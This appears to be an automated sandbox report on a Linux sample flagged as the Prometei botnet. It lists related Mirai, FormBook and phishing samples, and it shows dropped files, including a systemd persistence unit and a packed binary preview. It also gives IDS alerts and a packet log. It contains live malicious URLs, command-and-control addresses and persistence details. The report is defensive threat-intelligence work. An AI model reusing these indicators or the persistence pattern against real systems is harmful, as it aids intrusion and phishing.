Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	boatnet.arm5.elf	Get hash	malicious	Mirai	Browse	34.243.160.129
	mips.elf	Get hash	malicious	Mirai	Browse	54.171.230.55
	arm7.elf	Get hash	malicious	Unknown	Browse	54.217.10.153
	mips.elf	Get hash	malicious	Mirai	Browse	54.247.62.1
	https://protect.checkpoint.com/v2/r02/___https://lsems.gravityzone.bitdefender.com/xhfsdfMW5hMR~QDcqg1KugH/rhrqqgrWni2pyg1KugH/og75AgMRA37Cu37x!i2GzU2ZBRIJzYIFyRp4R0KWU0rWugMmJiYWAVpWKV1K4i6V8hIZ5SM0ZiLWEW1OmR5/DRLcQX0iG12ODR6m0Z2uCX54XhMGr31/03pyTfZ6rYZi~XpqUQYOHR1KUiJS11Z/0T2qVjY4XRZcYgpc9i5uJWYR7g20EjL0/YM46gJCqg7mLRrm6jJc4gn5DVr69X0OQV6WNfKt6Z1h7XJOYhqWIX20v3pR/S20XfZm6f1WH4qtBZKWOY6Wx4rKpZ0Onh80BSLOY4Mh83r/3ZsWx36GrQYOHS2SniIWZV507V1OzioqTfo0xY7S5jJhCSsiRhLiZZI4L35OUYZm~hJ/~js4tfpuWh5qOiIJ9fMm8gK0CTM04fsiv4555ipVyRpOyTY0xjK0AT1mQYYOfW5uUS842iqiCjr4qXIJ73o0Sg80RRoqYjI0~j0uN1qiWWpmz3sJBS6Z701OyRrSBfH5DWpWo3oSC02OW1JKCi5/DRsSt4KS/RImw1KZyRp49hsi~f6uZRsioj2uZR2mUg0KsQYOHiEK6RJ0/W8SoQYOHXZuJSoGRTMqP3rS2gr/t01xD4MF70sSmSLOOZ64Xh1/fi7bCW6G9f5OMVsGNgYW8XIqsSMq~TJR8RJxBgKq0XE09hr/5jqmJZ6mxR2STVryCZpC3WrcNf0JESsVDZM35QYOLRs0GRZc44pm4jYKUQYOLfM0xZ2W8X8iMf04SQYOLWIG7jpOt2EWBf1mNj1iTZ5NBhoqX4qhB4IV5Y5W7QYOHZZ/zgLb60KGB4sOxWZyqWqKnj1u01pWE3YOEiJms1MhB08uJjLiDZZBC00WSjMmq1ImDX6mPVYS0X0KYZ7yL4sKD3oGL4Jh912KMW2FDY0tBYEVE315DYZ65XZ4uTZiKXYixi6SOS5VDSZC5WsmSfKG5R53BjL6xfEKwSKuG12SX0KGAZ8W7R5WBSLl812iWf1Kq3r0vTLqHX5/LR50UWZ06TYKNRrcVd~FG88JcGJ/FGF88986aFHbKbb/JIIK/89KHGK8IHaG/I8KIcbba6c7cKI68GGKI7?h=6&fru;n=6&fru;ithx=6___.YzJlOmdhbmdzdGVyOmM6bzpiMTVjN2QxOWQyYmUwNTY1NzUzNWNiMjU5MjdlZDQxYTo3OjBjYTc6YjUxOGI0N2MzNmJhYjUzNGU2MzNkZWE3MDBkNGExYmIwNzljNzhmMDU2MmNkNzkwZDBhMjM3MDE5NjU0YTZkNTpoOlQ6VA	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	13.249.91.12
	https://business.peppercontent.io/items/1EeoNExLmk9	Get hash	malicious	Unknown	Browse	13.226.34.21
	file.exe	Get hash	malicious	FormBook	Browse	13.248.243.5
	na.elf	Get hash	malicious	Prometei	Browse	54.170.242.139
	na.elf	Get hash	malicious	Prometei	Browse	34.254.182.186
	main_sh4.elf	Get hash	malicious	Mirai	Browse	54.171.230.55
AMAZON-02US	boatnet.arm5.elf	Get hash	malicious	Mirai	Browse	34.243.160.129
	mips.elf	Get hash	malicious	Mirai	Browse	54.171.230.55
	arm7.elf	Get hash	malicious	Unknown	Browse	54.217.10.153
	mips.elf	Get hash	malicious	Mirai	Browse	54.247.62.1
	https://protect.checkpoint.com/v2/r02/___https://lsems.gravityzone.bitdefender.com/xhfsdfMW5hMR~QDcqg1KugH/rhrqqgrWni2pyg1KugH/og75AgMRA37Cu37x!i2GzU2ZBRIJzYIFyRp4R0KWU0rWugMmJiYWAVpWKV1K4i6V8hIZ5SM0ZiLWEW1OmR5/DRLcQX0iG12ODR6m0Z2uCX54XhMGr31/03pyTfZ6rYZi~XpqUQYOHR1KUiJS11Z/0T2qVjY4XRZcYgpc9i5uJWYR7g20EjL0/YM46gJCqg7mLRrm6jJc4gn5DVr69X0OQV6WNfKt6Z1h7XJOYhqWIX20v3pR/S20XfZm6f1WH4qtBZKWOY6Wx4rKpZ0Onh80BSLOY4Mh83r/3ZsWx36GrQYOHS2SniIWZV507V1OzioqTfo0xY7S5jJhCSsiRhLiZZI4L35OUYZm~hJ/~js4tfpuWh5qOiIJ9fMm8gK0CTM04fsiv4555ipVyRpOyTY0xjK0AT1mQYYOfW5uUS842iqiCjr4qXIJ73o0Sg80RRoqYjI0~j0uN1qiWWpmz3sJBS6Z701OyRrSBfH5DWpWo3oSC02OW1JKCi5/DRsSt4KS/RImw1KZyRp49hsi~f6uZRsioj2uZR2mUg0KsQYOHiEK6RJ0/W8SoQYOHXZuJSoGRTMqP3rS2gr/t01xD4MF70sSmSLOOZ64Xh1/fi7bCW6G9f5OMVsGNgYW8XIqsSMq~TJR8RJxBgKq0XE09hr/5jqmJZ6mxR2STVryCZpC3WrcNf0JESsVDZM35QYOLRs0GRZc44pm4jYKUQYOLfM0xZ2W8X8iMf04SQYOLWIG7jpOt2EWBf1mNj1iTZ5NBhoqX4qhB4IV5Y5W7QYOHZZ/zgLb60KGB4sOxWZyqWqKnj1u01pWE3YOEiJms1MhB08uJjLiDZZBC00WSjMmq1ImDX6mPVYS0X0KYZ7yL4sKD3oGL4Jh912KMW2FDY0tBYEVE315DYZ65XZ4uTZiKXYixi6SOS5VDSZC5WsmSfKG5R53BjL6xfEKwSKuG12SX0KGAZ8W7R5WBSLl812iWf1Kq3r0vTLqHX5/LR50UWZ06TYKNRrcVd~FG88JcGJ/FGF88986aFHbKbb/JIIK/89KHGK8IHaG/I8KIcbba6c7cKI68GGKI7?h=6&fru;n=6&fru;ithx=6___.YzJlOmdhbmdzdGVyOmM6bzpiMTVjN2QxOWQyYmUwNTY1NzUzNWNiMjU5MjdlZDQxYTo3OjBjYTc6YjUxOGI0N2MzNmJhYjUzNGU2MzNkZWE3MDBkNGExYmIwNzljNzhmMDU2MmNkNzkwZDBhMjM3MDE5NjU0YTZkNTpoOlQ6VA	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	13.249.91.12
	https://business.peppercontent.io/items/1EeoNExLmk9	Get hash	malicious	Unknown	Browse	13.226.34.21
	file.exe	Get hash	malicious	FormBook	Browse	13.248.243.5
	na.elf	Get hash	malicious	Prometei	Browse	54.170.242.139
	na.elf	Get hash	malicious	Prometei	Browse	34.254.182.186
	main_sh4.elf	Get hash	malicious	Mirai	Browse	54.171.230.55
FASTLYUS	ep_setup.exe	Get hash	malicious	Unknown	Browse	185.199.111.133
	Play Voicemail Transcription. (387.KB).svg	Get hash	malicious	HTMLPhisher	Browse	151.101.66.137
	https://protect.checkpoint.com/v2/r02/___https://lsems.gravityzone.bitdefender.com/xhfsdfMW5hMR~QDcqg1KugH/rhrqqgrWni2pyg1KugH/og75AgMRA37Cu37x!i2GzU2ZBRIJzYIFyRp4R0KWU0rWugMmJiYWAVpWKV1K4i6V8hIZ5SM0ZiLWEW1OmR5/DRLcQX0iG12ODR6m0Z2uCX54XhMGr31/03pyTfZ6rYZi~XpqUQYOHR1KUiJS11Z/0T2qVjY4XRZcYgpc9i5uJWYR7g20EjL0/YM46gJCqg7mLRrm6jJc4gn5DVr69X0OQV6WNfKt6Z1h7XJOYhqWIX20v3pR/S20XfZm6f1WH4qtBZKWOY6Wx4rKpZ0Onh80BSLOY4Mh83r/3ZsWx36GrQYOHS2SniIWZV507V1OzioqTfo0xY7S5jJhCSsiRhLiZZI4L35OUYZm~hJ/~js4tfpuWh5qOiIJ9fMm8gK0CTM04fsiv4555ipVyRpOyTY0xjK0AT1mQYYOfW5uUS842iqiCjr4qXIJ73o0Sg80RRoqYjI0~j0uN1qiWWpmz3sJBS6Z701OyRrSBfH5DWpWo3oSC02OW1JKCi5/DRsSt4KS/RImw1KZyRp49hsi~f6uZRsioj2uZR2mUg0KsQYOHiEK6RJ0/W8SoQYOHXZuJSoGRTMqP3rS2gr/t01xD4MF70sSmSLOOZ64Xh1/fi7bCW6G9f5OMVsGNgYW8XIqsSMq~TJR8RJxBgKq0XE09hr/5jqmJZ6mxR2STVryCZpC3WrcNf0JESsVDZM35QYOLRs0GRZc44pm4jYKUQYOLfM0xZ2W8X8iMf04SQYOLWIG7jpOt2EWBf1mNj1iTZ5NBhoqX4qhB4IV5Y5W7QYOHZZ/zgLb60KGB4sOxWZyqWqKnj1u01pWE3YOEiJms1MhB08uJjLiDZZBC00WSjMmq1ImDX6mPVYS0X0KYZ7yL4sKD3oGL4Jh912KMW2FDY0tBYEVE315DYZ65XZ4uTZiKXYixi6SOS5VDSZC5WsmSfKG5R53BjL6xfEKwSKuG12SX0KGAZ8W7R5WBSLl812iWf1Kq3r0vTLqHX5/LR50UWZ06TYKNRrcVd~FG88JcGJ/FGF88986aFHbKbb/JIIK/89KHGK8IHaG/I8KIcbba6c7cKI68GGKI7?h=6&fru;n=6&fru;ithx=6___.YzJlOmdhbmdzdGVyOmM6bzpiMTVjN2QxOWQyYmUwNTY1NzUzNWNiMjU5MjdlZDQxYTo3OjBjYTc6YjUxOGI0N2MzNmJhYjUzNGU2MzNkZWE3MDBkNGExYmIwNzljNzhmMDU2MmNkNzkwZDBhMjM3MDE5NjU0YTZkNTpoOlQ6VA	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.2.137
	https://ergc.onirique5.com/xRmONkR9H3tSwgZ6bakdPQM/	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	185.199.108.133
	Revised - Hartzellprop.com 2025 Handbook29828.doc	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	185.199.108.133
	Revised - Cwalker 2025 Handbook25807.doc	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	185.199.108.133
	http://hak5.com	Get hash	malicious	Unknown	Browse	151.101.194.137
	34209QB_EFT_Payment_Statemt25.svg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.194.137
	TRANS_ADV_9290910137_.svg	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	https://prapare.org/#	Get hash	malicious	Unknown	Browse	23.185.0.1
NCRENUS	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18
	ppc.elf	Get hash	malicious	Okiru	Browse	152.42.17.150
	m68k.elf	Get hash	malicious	Gafgyt, Okiru	Browse	204.86.1.177

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

/etc/CommId

Download File

Process:	/usr/sbin/uplugplay
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.625
Encrypted:	false
SSDEEP:	3:jkmOflvWn:POtO
MD5:	F9CB95E5D494B76367AC0B02A55E5A01
SHA1:	FB7FB93F269111CB1B2B61E100D94F1BA8D6E685
SHA-256:	F55D62316B34F30FC4C368FD8CE27E6E6880696088F3D0742EAF257EC12442C2
SHA-512:	CE7674E586BF6F84915CAD731A3F1D484392EB570FD0D25F0B3F5FD5B66A91796B378E2AFE85939DB74B7B3E498DB132AB41868B5F5EA2AADCE4F21C67E60B63
Malicious:	true
Reputation:	low
Preview:	97A85012XX91KDE3

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Reputation:	high, very likely benign file
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/usr/lib/systemd/system/uplugplay.service

Download File

Process:	/tmp/na.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	145
Entropy (8bit):	4.769509838572339
Encrypted:	false
SSDEEP:	3:zMZa75X1PxQJqtWA1+DRvBADMikAdIgQ+aQmNJX4ev+sirSkQmWA1+DRvn:z8uXcqtWA4RZAMD+aBNdhTILQmWA4Rv
MD5:	8CA62D1F47880BCE036C2956C9B7B272
SHA1:	3BCC3A5C4FCC5B0D08C4524A59F6B8E113B62060
SHA-256:	C655D3D4E374FAD38313EC4262207B2D7D68A870238F203EF3C33F85E66C8E32
SHA-512:	4CD2D9D67151FA25E833707DEE2442C4A5F752053FC2C36EC73C0E2B734C66CA69C63FCEB47714D9ADD5B9FE2EEE1E45BE5199E2CAE7C26173E766B333877DA6
Malicious:	false
Reputation:	high, very likely benign file
Preview:	[Unit].Description=UPlugPlay.After=multi-user.target..[Service].Type=forking.ExecStart=/usr/sbin/uplugplay..[Install].WantedBy=multi-user.target.

/usr/sbin/uplugplay

Download File

Process:	/tmp/na.elf
File Type:	ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
Category:	dropped
Size (bytes):	435932
Entropy (8bit):	7.94281928957466
Encrypted:	false
SSDEEP:	6144:63fxS1fHETSACF2Gzm5DVvSHrKKRH4SCra+HWMiFbcAOXmb4Dsi6wwcitg6:25WOSACZSV6eKRH5EPiamb4DsDwwcq
MD5:	E2D5C1F255DB046B94090A92B2AA672F
SHA1:	A382B70BAA2FC7E898E5C8AD62D232194DF5A124
SHA-256:	BD8B8E66915F4CA94ED557D8AD246CE4510C77C64AD2351A3F92B75CF752FC6F
SHA-512:	108DC7125E663BE84FE9BED7587E02954B3FF7AFEEDA0F4263C7A5CF2CE4406A76053EA9EE1BFE744F1868978021FE1FC23C2C827D8FC5117DF86C9B0296DFE9
Malicious:	true
Yara Hits:	Rule: Linux_Trojan_Dofloo_ac3333d1, Description: unknown, Source: /usr/sbin/uplugplay, Author: unknown
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 47% Antivirus: Virustotal, Detection: 37%, Browse
Reputation:	low
Preview:	.ELF..............>.....`.].....@...................@.8...........................@.......@.............XH...............................PW......PW.....M.......M...............Q.td....................................................V..9UPX!............!v..p............. ..ELF......>....@.......0..'8..........W.3c..-.......o..K>...@!v..{_bo./.O7.%....o.....l..-.R..XOH....6..o..p..@... ....om.r2...D_..n.D...O...M(.S.td...POQn..PpnG.oRO!..=.0...%I.$...@.P.............y......GNU....'..l......?D....N...k.n..m"c...i......._....R.%..y...#N./ $../..p.E....v!#...._..r....K....../0.\|.....p.L.........H...._...#/v..._P.C2.b.`....y!.K...x!...@p.2.".oh...`......X.B.C;P_.L/H....@...N..8?.0O.C;.`(...q.\. ..O.$ar .@%I.!v...}...I&.n.......H...H...H..t..."...9.....?..%.....D................................}....ume....]U....ME=....5-%...................&..E.t$..T$.<{....%.....H.\|$...~.9.g...Sd2.OH.. ......kn(...$. 1.H9..+..t>d....4..u......~2..w..H.. mU.H.=d...o...V..`...V..=[._w.Ru6..O

/var/lib/fwupd/gnupg/.#lk0x00005570808bbb80.galassia.5626

Download File

Process:	/usr/bin/gpg
File Type:	ASCII text
Category:	dropped
Size (bytes):	20
Entropy (8bit):	3.0086949695628418
Encrypted:	false
SSDEEP:	3:N/KNIvn:QIvn
MD5:	D294092F005116FFE4580BF1706153FC
SHA1:	49DBE53FDF44A8751820FA5F4CFDC7B4743C8F9B
SHA-256:	FF7B805D5104256E7E7A94BB969B8469BCD19FB9D8E3E7E26047C6E49D2CED61
SHA-512:	AB03E2C53B1C8D1EC0619068948D526CC664CAB16E54F7ABFF9E6C08C3B752F65AB7BFD9ED64F578259FFD01EE9D6CEA1221A24C288263CFF7D076075F2EA07C
Malicious:	false
Reputation:	low
Preview:	5626.galassia.

/var/lib/fwupd/gnupg/.#lk0x0000559239bcdb80.galassia.5641

Download File

Process:	/usr/bin/gpg
File Type:	ASCII text
Category:	dropped
Size (bytes):	20
Entropy (8bit):	3.108694969562842
Encrypted:	false
SSDEEP:	3:N/M2pE/vn:bpE/vn
MD5:	B099745E00942F6FA42EDE7D13ACE9E8
SHA1:	AB6058D87B3F13BE7853EBCC275615659EE1DC36
SHA-256:	F221FEF7241CB5EB7E9756F27E38D40A2BFA50C550C13F23AD48E44D3374C36E
SHA-512:	FD9F1259C9F6535F9C22969CFE210E5257A059A698B59B4E92CCE699DA00C7D42E2D99F393B8AD87C6F0D4D5FB554CC75246844DC2F190A4D05ED20018EC1B50
Malicious:	false
Reputation:	low
Preview:	5641.galassia.

/var/lib/fwupd/gnupg/.#lk0x000055965eb8bb80.galassia.5643

Download File

Process:	/usr/bin/gpg
File Type:	ASCII text
Category:	dropped
Size (bytes):	20
Entropy (8bit):	3.108694969562842
Encrypted:	false
SSDEEP:	3:N/MoHevn:hHevn
MD5:	0FFADC8FB53C4BC62762C6A01175285F
SHA1:	46A797D38A2AF3EFA75584C645A314CB6447C8DB
SHA-256:	0C2BE528BC7E2A386FC647499A63EE3F0E89A30C55479F222BDA7C7504CDBFCE
SHA-512:	D2032536FCFA7232F23D393B61527E71B9F5F99078610C67544C238C121C7C7537904E51C951719CCD1A9D0BC4C66BE66D1590AA6DD7399FCBE8FEFFB49EF8AB
Malicious:	false
Reputation:	low
Preview:	5643.galassia.

/var/lib/fwupd/gnupg/.#lk0x0000561fb6af5b80.galassia.5635

Download File

Process:	/usr/bin/gpg
File Type:	ASCII text
Category:	dropped
Size (bytes):	20
Entropy (8bit):	3.0086949695628418
Encrypted:	false
SSDEEP:	3:N/L6+vn:Z6+vn
MD5:	64CB1E60E6899861294A4185D97510FE
SHA1:	2D592D18E2E15172E129F683104EC8593550EE22
SHA-256:	53A7DDB76890D11F67F5162DB3C4B3545857D9C0FBFE271D4833ACB755C1BBCC
SHA-512:	3EF4AA9FA1C4AEF71C71AF3275CFBB9A07BCF05737B0ADA2E1A2FF27BAB8D7D99B2B9E210B934E45E25C8216A4A5F12ABC18FC3F2F5FD621E8212F022561241D
Malicious:	false
Reputation:	low
Preview:	5635.galassia.

/var/lib/fwupd/gnupg/pubring.kbx.tmp

Download File

Process:	/usr/bin/gpg
File Type:	GPG keybox database version 1, created-at Tue Aug 17 14:04:41 2021, last-maintained Tue Mar 25 20:20:39 2025
Category:	dropped
Size (bytes):	2534
Entropy (8bit):	7.618828601389271
Encrypted:	false
SSDEEP:	48:sjZ3Buh7g8ZMUfN1i9N+EvbYJYv20hIhoRU3h0LJv9ARRt:AUc8ZM+Y+AbcoRU3CARRt
MD5:	91D8B2A66B6EB1BF7EA1F5EB652DF63F
SHA1:	720273DBA40A77E169A7FA9FAFC0E762258D59C1
SHA-256:	3096B42D7BE7D395FEC1ACE4589324F5329993487F5C25129E11DA352B217D30
SHA-512:	6A015DBFFFE227D840961DE98FD40B6C8BEAAA6E5298B954B325FD67F3F1854AE3D1B555D682868A955BA99558E29B42A87A1DB8AE1C8A55CD708ED2F28E529B
Malicious:	false
Preview:	... ....KBXf....a...g......................^........?..A..../.H...E8..... .............~............................a...........U.........T.x8.sU....K'....F....l...K....cL.`Y......=....^~.5\|.%.......2..../.h..O..T........'.6E....HV..?.6l.......e..1o.O.,Y3....1,..a4..\|..s.w......f2......gaIK..i...x.T...~..W..N."..Z..ia!..V..so.....<.6j..........3C&..t1..Gf...j..z...U.........gpg.........Linux Vendor Firmware Service <sign@fwupd.org>....gpg.........7.....!..U..................................H...E8..c....d.....d.....3....a..y..?...........l...1/...)......T.f....-..UoxT... .v...\|...7.....d..PB..>..W{...-..R....&S.....~..2.ps.8:...{..^{?..@.?..e6....y...c.Rw.SK.F.;U)...A..S> an....W.?.\|.{.dB....x~B...V....O....'./!...\|;...Xw.:.!.p,n.A.H\..\...).....gpg......z.......D<............~...$......B.Y..A...n.m...o=.... ......8>4.G8E..L...+G..Z...<.................Z............................a...........[.......I....DR:....!._.P..`.1..6.9..G....O.y.?.......

Static File Info

General

File type:	ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
Entropy (8bit):	7.94281928957466
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 50.16% ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:	na.elf
File size:	435'932 bytes
MD5:	e2d5c1f255db046b94090a92b2aa672f
SHA1:	a382b70baa2fc7e898e5c8ad62d232194df5a124
SHA256:	bd8b8e66915f4ca94ed557d8ad246ce4510c77c64ad2351a3f92b75cf752fc6f
SHA512:	108dc7125e663be84fe9bed7587e02954b3ff7afeeda0f4263c7a5cf2ce4406a76053ea9ee1bfe744f1868978021fe1fc23c2c827d8fc5117df86c9b0296dfe9
SSDEEP:	6144:63fxS1fHETSACF2Gzm5DVvSHrKKRH4SCra+HWMiFbcAOXmb4Dsi6wwcitg6:25WOSACZSV6eKRH5EPiamb4DsDwwcq
TLSH:	869423F8C83D2E30D8169B3CBB5A826CF0A15772D9562F6AB51AF5732179F1FAC60101
File Content Preview:	.ELF..............>.....`.].....@...................@.8...........................@.......@.............XH...............................PW......PW.....M.......M...............Q.td....................................................V..9UPX!............!v.

Static ELF Info

ELF header
Class:	ELF64
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Advanced Micro Devices X86-64
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x15de360
Flags:	0x0
ELF Header Size:	64
Program Header Offset:	64
Program Header Size:	56
Number of Program Headers:	3
Section Header Offset:	0
Section Header Size:	0
Number of Section Headers:	0
Header String Table Index:	0

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align
LOAD	0x0	0x400000	0x400000	0x1000	0x1174858	7.6054	0x6	RW	0x1000
LOAD	0x0	0x1575000	0x1575000	0x69e4d	0x69e4d	7.9430	0x5	R E	0x1000
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x10

Network Behavior

Download Network PCAP: filtered – full

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-25T21:20:35.730994+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.13	34314	152.36.128.18	80	TCP
2025-03-25T21:20:37.950927+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.13	34316	152.36.128.18	80	TCP
2025-03-25T21:22:39.352832+0100	2044560	ET MALWARE Prometei Botnet CnC DGA - xinchao Pattern	1	192.168.2.13	35046	8.8.8.8	53	UDP
2025-03-25T21:22:39.460768+0100	2044560	ET MALWARE Prometei Botnet CnC DGA - xinchao Pattern	1	192.168.2.13	60773	8.8.8.8	53	UDP
2025-03-25T21:22:39.569107+0100	2044560	ET MALWARE Prometei Botnet CnC DGA - xinchao Pattern	1	192.168.2.13	40957	8.8.8.8	53	UDP
2025-03-25T21:22:40.158987+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.13	60504	54.170.242.139	80	TCP
2025-03-25T21:22:40.419965+0100	2018141	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz	1	54.170.242.139	80	192.168.2.13	60504	TCP
2025-03-25T21:22:40.419965+0100	2037771	ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	1	54.170.242.139	80	192.168.2.13	60504	TCP

Network Port Distribution

Total Packets: 353
• 443 (HTTPS)
• 80 (HTTP)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 25, 2025 21:20:20.256783009 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:20.256933928 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:20.372622013 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:20.372920990 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:20.850492954 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:20.850652933 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:20.995239019 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:20.995441914 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:21.136142969 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:21.136342049 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:21.266060114 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:21.266190052 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:21.433049917 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:21.433475018 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:21.565684080 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:21.565830946 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:21.598448038 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:21.598546028 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:21.701673031 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:21.701739073 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:21.728476048 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:21.728538036 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:21.833671093 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:21.833734989 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:21.858597994 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:21.858659983 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:21.971250057 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:21.971293926 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:21.988512993 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:21.988554001 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:22.023160934 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:22.023216963 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:22.110162973 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:22.110224009 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:22.132322073 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:22.132390022 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:22.144609928 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:22.187316895 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:22.247066021 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:22.247107983 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:22.247181892 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:22.321553946 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:22.322037935 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:22.322086096 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:22.385121107 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:22.385185957 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:22.385251045 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:22.418106079 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:22.418150902 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:22.418247938 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:22.512291908 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:22.512312889 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:22.512418032 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:22.538094997 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:22.561631918 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:22.561672926 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:22.561697006 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:22.603322029 CET	38240	443	192.168.2.13	151.101.2.49
Mar 25, 2025 21:20:22.649260044 CET	443	38240	151.101.2.49	192.168.2.13
Mar 25, 2025 21:20:22.649375916 CET	443	38240	151.101.2.49	192.168.2.13
